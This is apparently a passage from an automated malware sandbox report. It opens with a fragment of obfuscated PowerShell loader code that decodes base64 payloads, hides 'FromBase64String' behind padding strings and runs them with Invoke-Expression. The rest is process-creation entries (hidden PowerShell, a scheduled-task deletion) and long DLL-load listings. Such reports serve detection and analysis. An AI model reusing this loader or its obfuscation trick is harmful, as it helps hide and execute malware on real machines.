($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
